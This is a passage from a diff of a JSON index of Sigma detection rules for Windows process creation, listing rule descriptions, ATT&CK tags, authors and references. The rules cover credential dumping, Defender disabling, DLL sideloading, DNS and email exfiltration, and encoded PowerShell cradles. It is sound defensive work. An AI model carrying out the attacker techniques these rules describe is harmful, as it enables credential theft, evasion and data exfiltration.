"attack.t1003" + ], + "creation_date": "2022/10/04", + "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Archer malware invocation via rundll32", + "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "value": "Fireball Archer Install", + "meta": { + "refs": [ + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2017/06/03", + "filename": "proc_creation_win_crime_fireball.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "value": "Maze Ransomware", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", + "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" + ], + "creation_date": "2020/05/08", + "filename": "proc_creation_win_crime_maze_ransomware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", + "value": "Snatch Ransomware", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2020/08/26", + "filename": "proc_creation_win_crime_snatch_ransomware.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "value": "Windows Crypto Mining Indicators", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ], + "creation_date": "2021/10/26", + "filename": "proc_creation_win_crypto_mining_monero.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners", + "Some build frameworks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", + "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "value": "Curl Usage on Windows", + "meta": { + "refs": [ + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/07/05", + "filename": "proc_creation_win_curl_download.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "value": "CVE-2021-26857 Exchange Exploitation", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26857" + ], + "creation_date": "2021/03/03", + "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "value": "Data Compressed - rar.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_data_compressed_with_rar.yml", + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "level": "low", + "falsepositive": [ + "Highly likely if rar is a default archiver in the monitored environment." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "value": "Wbadmin Delete Systemstatebackup", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_delete_systemstatebackup.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", + "uuid": "4e762605-34a8-406d-b72e-c1a089313320", + "value": "Detecting Fake Instances Of Hxtsr.exe", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2020/04/17", + "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". \nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "value": "DLL Sideloading via DeviceEnroller.exe", + "meta": { + "refs": [ + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", + "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/29", + "filename": "proc_creation_win_deviceenroller_evasion.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "value": "DInject PowerShell Cradle CommandLine Flags", + "meta": { + "refs": [ + "https://github.com/snovvcrash/DInjector", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2021/12/07", + "filename": "proc_creation_win_dinjector.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of DirLister.exe", + "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "value": "Launch DirLister Executable", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_dirlister.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "value": "Disable Windows Defender AV Security Monitoring", + "meta": { + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", + "author": "ok @securonix invrep-de, oscd.community, frack113", + "level": "high", + "falsepositive": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", + "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "value": "Sc Or Set-Service Cmdlet Execution to Disable Services", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_disable_service.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrators settings a service to disable via script or cli for testing purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "value": "Discover Private Keys", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2021/07/20", + "filename": "proc_creation_win_discover_private_keys.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "value": "DLL Sideloading by Microsoft Defender", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_dll_sideload_defender.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "value": "DLL Sideloading by VMware Xfer Utility", + "meta": { + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", + "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", + "value": "DNSCat2 Powershell Implementation Detection Via Process Creation", + "meta": { + "refs": [ + "https://github.com/lukebaggett/dnscat2-powershell", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071", + "attack.t1071.004", + "attack.t1001.003", + "attack.t1041" + ], + "creation_date": "2020/08/08", + "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", + "author": "Cian Heasley", + "level": "high", + "falsepositive": [ + "Other powershell scripts that call nslookup.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", + "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", + "value": "Discovery/Execution via dnscmd.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1543.003" + ], + "creation_date": "2022/07/31", + "filename": "proc_creation_win_dnscmd_discovery.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Legitimate administration use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Well-known DNS Exfiltration tools execution", + "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "value": "DNS Exfiltration and Tunneling Tools Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate usage of iodine or dnscat2 \u2014 DNS Exfiltration tools (unlikely)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "value": "DNS ServerLevelPluginDll Install", + "meta": { + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ], + "creation_date": "2017/05/08", + "filename": "proc_creation_win_dns_serverlevelplugindll.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://twitter.com/_felamos/status/1204705548668555264", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_dotnet.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Dsacls to grant over permissive permissions", + "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", + "value": "Abusing Permissions Using Dsacls", + "meta": { + "refs": [ + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_dsacls_abuse_permissions.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administrators granting over permissive permissions to users" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible password spraying attempts using Dsacls", + "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "value": "Password Spraying Attempts Using Dsacls", + "meta": { + "refs": [ + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_dsacls_password_spray.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of dsacls to bind to an LDAP session" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "value": "Dism Remove Online Package", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/01/16", + "filename": "proc_creation_win_dsim_remove.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "value": "DumpStack.log Defender Evasion", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1479094189048713219", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/06", + "filename": "proc_creation_win_dumpstack_log_evasion.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects email exfiltration via powershell cmdlets", + "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", + "value": "Email Exifiltration Via Powershell", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_email_exfil_via_powershell.yml", + "author": "Nasreddine Bencherchali (rule), Azure-Sentinel (idea)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "value": "Hidden Powershell in Link File Pattern", + "meta": { + "refs": [ + "https://www.x86matthew.com/view_post?id=embed_exe_lnk", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/02/06", + "filename": "proc_creation_win_embed_exe_lnk.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate commands in .lnk files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a base64 encoded FromBase64String keyword in a process command line", + "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "value": "Encoded FromBase64String", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/24", + "filename": "proc_creation_win_encoded_frombase64string.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a base64 encoded IEX command string in a process command line", + "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", + "value": "Encoded IEX", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/23", + "filename": "proc_creation_win_encoded_iex.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", + "value": "Enumeration for 3rd Party Creds From CLI", + "meta": { + "refs": [ + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "value": "Enumeration for Credentials in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "value": "Esentutl Steals Browser Information", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_esentutl_webcache.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "uuid": "41421f44-58f9-455d-838a-c398859841d4", + "value": "COMPlus_ETWEnabled Command Line Arguments", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_etw_modification_cmdline.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "value": "Disable of ETW Trace", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", 